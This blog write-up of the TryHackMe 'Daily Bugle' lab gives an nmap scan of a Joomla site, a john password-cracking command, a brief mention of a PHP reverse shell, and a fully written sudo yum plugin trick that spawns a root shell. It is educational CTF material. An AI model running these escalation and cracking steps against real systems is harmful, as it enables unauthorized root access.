Try Hack Me: Daily Bugle Write-up

Enumeration

>nmap -sC -sV <TARGET IP> -oN initial.nmap
# Nmap 7.91 scan initiated Tue Oct 5 22:17:37 2021 as: nmap -sC -sV -oN initial.nmap <TARGET IP>
Nmap scan report for <TARGET IP>
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 5 22:18:23 2021 -- 1 IP address (1 host up) scanned in 46.00 seconds
Daily Bugle Site
/language/en-GB/en-GB.xml
Joomla! 3.7.0

SQL Injection

Password Cracking

> john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

Gaining a Foothold

using pentestmonkeys php reverse shell
initial shell

Privilege Escalation

su jjameson
sudo -l
[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat >$TF/x<<EOF
cat >$TF/x<<EOF
> [main]
[main]
> plugins=1
plugins=1
> pluginpath=$TF
pluginpath=$TF
> pluginconfpath=$TF
pluginconfpath=$TF
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<<EOF
cat >$TF/y.conf<<EOF
> [main]
[main]
> enabled=1
enabled=1
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<<EOF
cat >$TF/y.py<<EOF
> import os
import os
> import yum
import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
requires_api_version='2.1'
> def init_hook(conduit):
def init_hook(conduit):
> os.execl('/bin/sh','/bin/sh')
os.execl('/bin/sh','/bin/sh')
> EOF
EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
whoami
root

--

--

--

Follow along as I post CTF write-ups in preparation for the OSCP!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

InsureDAO, you need to know

{UPDATE} La? Lite Hack Free Resources Generator

Unity, Community, Identity —  PhotoChromic

Sphinx: The anonymous data format behind Lightning and Nym

It’s time.

Cyber Security: The Impact of Cyber Security on Your Business

Is Data Science a threat to future ?

GDPR — What does it mean for inbound marketing?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Max Register

Max Register

Follow along as I post CTF write-ups in preparation for the OSCP!

More from Medium

My First CTF (PicoCTF) — Obedient Cat!

Advent of Cyber 2021 — [Day 1] Save The Gifts

Task 17 [Day 12] Networking Sharing Without Caring(Advent of Cyber 3 2021)

THM Advent-of-cyber 2021 Day23